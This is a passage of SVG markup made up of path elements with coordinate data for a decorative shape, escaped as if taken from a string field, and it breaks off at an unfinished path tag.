62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path 